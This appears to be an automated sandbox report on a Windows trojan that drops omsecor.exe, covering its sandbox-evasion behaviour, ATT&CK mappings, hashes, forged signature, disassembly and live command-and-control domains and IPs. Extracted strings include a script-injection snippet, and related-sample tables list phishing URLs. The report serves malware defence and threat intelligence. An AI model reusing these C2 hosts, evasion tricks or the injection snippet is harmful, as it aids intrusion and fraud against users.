          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-5733
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5861
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-5861
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-5784
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeAPI coverage: 8.6 %
          Source: C:\Users\user\AppData\Roaming\omsecor.exe TID: 4344Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 4620Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2876Thread sleep time: -130000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exe TID: 2876Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040ABD9 FindFirstFileW,FindClose,0_2_0040ABD9
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040ABD9 FindFirstFileW,FindClose,5_2_0040ABD9
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,5_2_00408248
          Source: C:\Windows\SysWOW64\omsecor.exeThread delayed: delay time: 60000Jump to behavior
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2339564374.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000729000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.000000000068F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeAPI call chain: ExitProcess graph end nodegraph_0-5889
          Source: C:\Windows\SysWOW64\omsecor.exeAPI call chain: ExitProcess graph end nodegraph_5-5889
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CD66
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004075D4 GetLastError,CreateFileW,CreateFileW,CreateFileW,GetFileSize,GetProcessHeap,RtlAllocateHeap,ReadFile,ReadFile,WriteFile,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,WriteFile,CloseHandle,CloseHandle,CloseHandle,0_2_004075D4
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 5_2_004032B8
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040CD66 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_2_0040CD66
Source: nNX5KYQRhg.exe, omsecor.exe | Binary or memory string: Shell_TrayWnd
Source: nNX5KYQRhg.exe, omsecor.exe.0.dr, omsecor.exe.2.dr | Binary or memory string: ftpPriorHostTimeCorrUniqueNumhttp://AppEvents\Schemes\Apps\Explorer\Navigating\.currentSOFTWARE\Classes\MIME\Database\Content Type\text/htmlapplication/x-javascripttext/javascriptCLSIDBuildSOFTWARE\Microsoft\Internet ExplorerJOB FILE^nocryptPage generated at: http:__scMMdj490)0-Osdurandcrandsetvarmsec1970b_nav_time*CsMSoftware\Microsoft\Windows NT\CurrentVersion\WindowsAppInit_DLLsC:\WINDOWS\system32\gbdwpbm.dll.jar.mpeg.mpg.3gp.mov.mkv.wmv.avi.mp3.pdf.7z.gz.exe.rar.zip.xls.docvar scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);Aahttp_self&host=track_eventsjavascriptbegun.ru/click.jsp?url=an.yandex.ru/count_blank,"url""domain""encrypted""URL""condition_id""kwtype"<domain></domain><url></url><title></title>http://click0^POSTShell.ExplorerAtlAxWineventConnShell_TrayWndAccept: */*
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040CB03 cpuid | 0_2_0040CB03
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_00407267 GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__aulldiv | 0_2_00407267
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_00407499 GetLocalTime,GetLocalTime,GetLocalTime,GetTimeZoneInformation,SystemTimeToFileTime,SystemTimeToFileTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z | 0_2_00407499
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_00406CB5 GetVersionExW | 0_2_00406CB5
MITRE ATT&CK Matrix (one line per tactic; a number before a technique is the count shown beside it in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; 21 Native API; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 121 Masquerading; 11 Virtualization/Sandbox Evasion; 2 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 2 System Time Discovery; 21 Security Software Discovery; 1 Process Discovery; 11 Virtualization/Sandbox Evasion; 1 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

Submitted sample

Source | Detection | Scanner | Label
nNX5KYQRhg.exe | 87% | ReversingLabs | Win32.Trojan.ButeRat
nNX5KYQRhg.exe | 100% | Avira | TR/SpyVoltar.absza
nNX5KYQRhg.exe | 100% | Joe Sandbox ML |

Dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Avira | TR/SpyVoltar.absza
C:\Windows\SysWOW64\omsecor.exe | 100% | Avira | TR/SpyVoltar.absza
C:\Users\user\AppData\Roaming\omsecor.exe | 100% | Joe Sandbox ML |
C:\Windows\SysWOW64\omsecor.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
lousta.net | 193.166.255.171 | true | true | | unknown
mkkuei4kdsz.com | 15.197.204.56 | true | true | | unknown
ow5dirasuek.com | 52.34.198.229 | true | true | | unknown
                                                                                                                                                                                              http://ow5dirasuek.com/158/381.html4uomsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                http://lousta.net/810/632.htmlHomsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://mkkuei4kdsz.com/126/170.html3omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://mkkuei4kdsz.com/87/444.htmlp4omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      http://mkkuei4kdsz.com/126/170.htmlH4omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://lousta.net/107/805.html(omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          http://lousta.net/691/461.htmlenaomsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://lousta.net/691/461.htmlhtmlomsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
193.166.255.171 | lousta.net | Finland | 1741 | FUNETASFI | true
52.34.198.229 | ow5dirasuek.com | United States | 16509 | AMAZON-02US | true
15.197.204.56 | mkkuei4kdsz.com | United States | 7430 | TANDEMUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1546830
Start date and time: 2024-11-01 16:21:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: nNX5KYQRhg.exe
renamed because original name is a hash value
Original Sample Name: 682abf7611b349bb614207e0fcca057ab84389a6.exe
Detection: MAL
Classification: mal100.bank.troj.evad.winEXE@7/3@3/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 23
• Number of non-executed functions: 116
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: nNX5KYQRhg.exe
Time | Type | Description
11:22:09 | API Interceptor | 28x Sleep call for process: omsecor.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.166.255.171 | bd0wJGTae5.exe | malicious | Neconyd | lousta.net/562/252.html
193.166.255.171 | HUo09bfA3g.exe | malicious | Neconyd | lousta.net/989/145.html
193.166.255.171 | Update-KB4890-x86.exe | malicious | Unknown | www4.cedesunjerinkas.com/chr/wtb/lt.exe
193.166.255.171 | Update-KB4890-x86.exe | malicious | Unknown | www4.cedesunjerinkas.com/chr/wtb/lt.exe
193.166.255.171 | document.log.scr.exe | malicious | Unknown | www4.cedesunjerinkas.com/chr/wtb/lt.exe
193.166.255.171 | yGktPvplJn.exe | malicious | Pushdo | www.synetik.net/
193.166.255.171 | cnzWgjUhS2.exe | malicious | Neconyd | lousta.net/161/343.html
193.166.255.171 | Z0rY97IU6r.exe | malicious | Neconyd | lousta.net/372/625.html
193.166.255.171 | 2VJZxIY76V.exe | malicious | Neconyd | lousta.net/766/881.html
193.166.255.171 | qIIGdGOTWO.exe | malicious | Neconyd | lousta.net/240/311.html
52.34.198.229 | bd0wJGTae5.exe | malicious | Neconyd | ow5dirasuek.com/776/947.html
52.34.198.229 | HUo09bfA3g.exe | malicious | Neconyd | ow5dirasuek.com/145/281.html
52.34.198.229 | OjKmJJm2YT.exe | malicious | Simda Stealer | lygyvuj.com/login.php
52.34.198.229 | 5AFlyarMds.exe | malicious | Simda Stealer | lygyvuj.com/login.php
52.34.198.229 | cnzWgjUhS2.exe | malicious | Neconyd | ow5dirasuek.com/968/405.html
52.34.198.229 | Z0rY97IU6r.exe | malicious | Neconyd | ow5dirasuek.com/944/938.html
52.34.198.229 | 2VJZxIY76V.exe | malicious | Neconyd | ow5dirasuek.com/643/773.html
52.34.198.229 | RfdNuhaVvG.exe | malicious | Sakula RAT | www.savmpet.com/photo/bcyybe-1288432018.jpg?resid=5281296
52.34.198.229 | uB31aJH4M0.exe | malicious | Simda Stealer | lygyvuj.com/login.php
52.34.198.229 | qIIGdGOTWO.exe | malicious | Neconyd | ow5dirasuek.com/342/85.html
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ow5dirasuek.com | bd0wJGTae5.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | HUo09bfA3g.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | cnzWgjUhS2.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | Z0rY97IU6r.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | 2VJZxIY76V.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | qIIGdGOTWO.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | O0prB0zCWi.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | djvu452.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | gdvfd35.exe | malicious | Neconyd | 52.34.198.229
ow5dirasuek.com | v48ge.exe | malicious | Neconyd |
                                                                                                                                                                                                              • 52.34.198.229
                                                                                                                                                                                                              mkkuei4kdsz.combd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 15.197.204.56
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              gdvfd35.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 64.225.91.73
                                                                                                                                                                                                              lousta.netbd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              djvu452.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              v48ge.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
                                                                                                                                                                                                              moviename.exeGet hashmaliciousNeconydBrowse
                                                                                                                                                                                                              • 193.166.255.171
Match       | Associated Sample Name / URL | Detection | Threat Name | Context
FUNETASFI   | bd0wJGTae5.exe | malicious | Neconyd | 193.166.255.171
            | HUo09bfA3g.exe | malicious | Neconyd | 193.166.255.171
            | Update-KB4890-x86.exe | malicious | Unknown | 193.166.255.171
            | Update-KB4890-x86.exe | malicious | Unknown | 193.166.255.171
            | document.log.scr.exe | malicious | Unknown | 193.166.255.171
            | j3Lr4Fk7Kb.elf | malicious | Mirai | 86.50.36.169
            | nabarm.elf | malicious | Unknown | 130.232.111.233
            | splarm.elf | malicious | Unknown | 192.98.38.193
            | mips.elf | malicious | Mirai, Moobot | 157.24.20.223
            | nklarm5.elf | malicious | Unknown | 193.166.100.123
AMAZON-02US | bd0wJGTae5.exe | malicious | Neconyd | 52.34.198.229
            | dlr.arm6.elf | malicious | Okiru | 54.217.10.153
            | zmap.ppc.elf | malicious | Mirai, Okiru | 54.171.230.55
            | https://woobox.com/sf4hxr | malicious | HTMLPhisher | 52.217.197.137
            | https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNrXNM8F2aafYGXvb9twEoQeHC7ZwjccAi1SjLazzmL714x6k-2BjB-2FYwt496nNWzarkpA5xghtVvgqYssmknAftbQJOVkiDX5sql0puMOlG6Ca2eid008YPu-2FJJAayp-2BNXls84A_lhEpvcamcm95WhC017PRgRonrgi5omZ3brQwNa5yLk0xxDl3uLY9zV0ZhBwsp9AfIBgWj8srFe156S5Zns8ZjIc0B22GBm-2FhZ3msRvLKzUyGIuCFlA1E-2FK-2F4jc3IgU8qM5k5KxMmIwIRDSCQDvTZvmwB5zeTeqWWEJR7CvWSpeaqIj3hj5IgcRcoPBdptLYrUK3YLUsGuU0Nn50M3ArOROvseGYqZul0QkeqtDR41-2FsPFt-2Bw0YWW2P5gsCDH4XINxncIhICPIqlacC1ih-2B-2BRAhsouCrf5nolEyzWx0VnR2OrLuGwvR4-2BmBTgXGq5SQJ3CbNvM-2FaB5BLerpFqmqjPC-2FBlK6th1iVrhfmtBEFKLash-2FnkPpQ9qFxGwWTexJMh100AS4PilK2-2BJDfvjssuxk2jP-2BTagNOazV2F1Jk9Mugr3y7E9SivEGWyUbzdMThmnpVydb1qOFwMiocztErv1WWaB8B20Oa2SLt-2BLBsMdusfLwd3NNzPre6el-2F-2BIwBxDAqBb9JLV6vOLzfaD2L4-2BEuPbgzcrscVtaCNyARGoPUKi03imhTbJEcig8L4weEiABND5vwKtA-2FhKo5AjxecXMO22Vq7Og2y7v-2BJNgFB9rr-2Bm4W45XZxFP39Dqi18SUPOKX4pHFrdACciPinuj2QtBtIGNjV46-2Bve9hu0g1-2FpG1tOVv9Ebn32k-2Bl6CF6b6jzS3aTQvZkWKNIwLx5CoGs9uomn9yZPi6QaiSTeQkZ1uHupSYpVxbBCb-2FUyo6kMlbB0P27ShEzUFVY-2FpfPcfFofTKD4p7rklaM-2FIuG8-2F3ytR7SJ7I8GmSP8NTWs4vu3NTpV5MkgHfjeFoK-2BDQh6M7S2ys2qIf8m3qiLtFMHY6p7m4ep8JZqbC0axloFSX-2Fzbz51ZW-2BsyQEEbRqwx0S1i4lo9NhRXrfXOvn0A83bBDk31g9QfoWTGhHCjSEfuca9KJwe0GCABYAuqYeYHMc5qXhPv86r0l0ldRpwe39V9LJ5m6Go-3D | malicious | Unknown | 65.9.66.43
            | https://hotmail.cdisaomiguel.com.br | malicious | Unknown | 18.245.31.5
            | https://tas-pe.com/ahowe@europait.net#ahowe@europait.net | malicious | HTMLPhisher | 18.245.31.121
            | https://us.pbe.encryption.symantec.com/login.html?msgUserId=13963009e4fab12e&enterprise=questdiagnostics&rrRegcode=9hfnDzwZ&locale=en_US | malicious | Unknown | 52.14.194.37
            | HUo09bfA3g.exe | malicious | Neconyd | 52.34.198.229
            | ae713827-e32c-f66b-fbdb-5405db450711.eml | malicious | Unknown | 75.2.57.54
TANDEMUS    | bd0wJGTae5.exe | malicious | Neconyd | 15.197.204.56
            | HUo09bfA3g.exe | malicious | Neconyd | 15.197.204.56
            | https://send-space.s3.eu-north-1.amazonaws.com/de.html | malicious | Unknown | 15.197.193.217
            | FW CMA SHZ Freight invoice CHN1080769.exe | malicious | FormBook | 15.197.225.128
            | BbkbL3gS6s.msi | malicious | Unknown | 15.197.137.111
            | Reminders for Msp-partner_ Server Alert.eml | malicious | HTMLPhisher | 15.197.193.217
            | Viridine84.exe | malicious | FormBook, GuLoader | 15.197.148.33
            | la.bot.arm.elf | malicious | Unknown | 15.211.66.93
            | http://bigfoot99.com | malicious | Unknown | 15.197.193.217
            | https://ascot.auditboardapp.com/task-redirect/4113?source=email&CTA=taskTitleLink&notificationId=044e55a3-481a-4a33-91c7-abbaf803b1d7&projectId=367&taskId=4113&notificationType=WS-task-submitted | malicious | Unknown | 15.197.213.252
No context
No context
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\nNX5KYQRhg.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):82768
                                                                                                                                                                                                              Entropy (8bit):6.931973987188612
                                                                                                                                                                                                              Encrypted:false
SSDEEP:1536:nd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:PdseIOMEZEyFjEOFqTiQmOl/5xPvw3
MD5:DCC8263D314F19A3A35E32EDFCCDC942
SHA1:D4AD269F9FEDD8B359B1AD2A380A200E92656D74
SHA-256:7BF175DA76679D24C80F78BE8A38E9D71286F944885CBD3B349B1E5AA43CEF17
SHA-512:4B9BCC64347700EC9998A8A11B852A5FA97E232B8E4335C29187695B935963D36D7DC4B66AE057971E13E5F40F19FFE83032EAF3423BDD9762CB57E800937A2A
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Process:C:\Windows\SysWOW64\omsecor.exe
File Type:data
Category:dropped
Size (bytes):100
Entropy (8bit):1.8901865117490424
Encrypted:false
SSDEEP:3:gtqyu/JSzv/qvdOdFV:gwDAzviU/
MD5:11598988334FA23E5801B318FADCDD95
SHA1:F116E9AB51BE03B2D8BC69A04C7269A1C43E7917
SHA-256:1EADB45BFEB7402242E4FCBFEE5CC925A260AD22769AD21B74BD0788769EC5B5
SHA-512:08FAD81A0E5065A526DC4B9B317CC6AD4CC37C1A82306645B104718419AD1019B0D9D597F2DF7CC87D82F12C4C71B9B7D646D890BE28B9982B5A3F510D239D2C
Malicious:false
Reputation:low
Process:C:\Users\user\AppData\Roaming\omsecor.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):82768
Entropy (8bit):6.93198150938138
Encrypted:false
SSDEEP:1536:Jd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:JdseIOMEZEyFjEOFqTiQmOl/5xPvw3
MD5:1FB6FB78751B952FE1D6BEBA89C93830
SHA1:74DF9E9309715128ADD09CF3FA3E80D670B81ECD
SHA-256:E4020F1799722258E62AFD948A5DB176524B8E1831D6738C82B5ADF4D835A1A0
SHA-512:A25D8943FE382B8B0DDF9DDBDED01A9405C068ED56CA1B70B852DA83E39CEA2E3F65084703D9D66148648F8189F6B236E23460F9014200CBA1903694449260C7
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.931971441078146
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:nNX5KYQRhg.exe
File size:82'768 bytes
MD5:44a881b87bb2d5dfe7062b9a7538425f
SHA1:682abf7611b349bb614207e0fcca057ab84389a6
SHA256:fc22b8c7e16c145772129e466d1977f14f09c1302da688eb96863e409cbb6a58
SHA512:5789c8c42bc75efdba39d1715a71c40142dd8946c40a127b29c9b7c575ae51186e2d241dd287791d6d7e501b23132282cf2ce8d7d87d60285272439233c23bd5
SSDEEP:1536:Xd9dseIOcE93bIvYvZEyF4EEOF6N4yS+AQmZcl/52izbR9Xwzz:fdseIOMEZEyFjEOFqTiQmOl/5xPvw3
TLSH:73839D95B6F88076E9A318B0627CE9929CBDBEB515A0D0C3D350AC871EE13D2D73435B
Icon Hash:00928e8e8686b000
Entrypoint:0x40b346
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:0x50B39C2B [Mon Nov 26 16:43:23 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:08b67a9663d3a8c9505f3b2561bbdd1c
Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 02/09/2021 20:25:58 01/09/2022 20:25:58
Subject Chain
• CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint MD5:07BA2F139D35455A934AB0CED10CBE41
Thumbprint SHA-1:5A257D333718C4B468A5DBC6643348AF667AEE3D
Thumbprint SHA-256:F66C648A39C2B4845719707319B96BA37A6EFC854D02D4AB3EDA1B2DA853B7EB
Serial:3300000439F61F7A676DA000AF000000000439
Instruction
push ebp
mov ebp, esp
mov eax, 00001800h
call 00007F016532D762h
push ebx
push esi
push edi
mov edi, dword ptr [0040E0B0h]
mov esi, 00000400h
push esi
lea eax, dword ptr [ebp-00000800h]
push eax
xor ebx, ebx
push ebx
call edi
push 0040F4FCh
lea eax, dword ptr [ebp-00000800h]
call 00007F016532561Ah
test eax, eax
pop ecx
je 00007F016532B55Fh
lea eax, dword ptr [ebp-00001800h]
push eax
call 00007F016532AD96h
test eax, eax
pop ecx
jne 00007F016532B54Eh
push esi
lea eax, dword ptr [ebp-00000800h]
push eax
push ebx
call edi
push 00000001h
lea eax, dword ptr [ebp-00000800h]
push eax
push 0040F414h
push 0040F1D8h
push 80000001h
call 00007F0165326B46h
add esp, 14h
test eax, eax
push 00000004h
je 00007F016532B507h
push ebx
push 00000003h
jmp 00007F016532B50Bh
call dword ptr [0040E064h]
push eax
push 00000006h
call 00007F016532A8B3h
add esp, 0Ch
call 00007F016532B3F3h
                                                                                                                                                                                                              call 00007F016532AC1Dh
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              jne 00007F016532B4F4h
                                                                                                                                                                                                              call 00007F016532AC93h
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              je 00007F016532B563h
                                                                                                                                                                                                              push 00002710h
                                                                                                                                                                                                              call dword ptr [0040E070h]
                                                                                                                                                                                                              push 00000004h
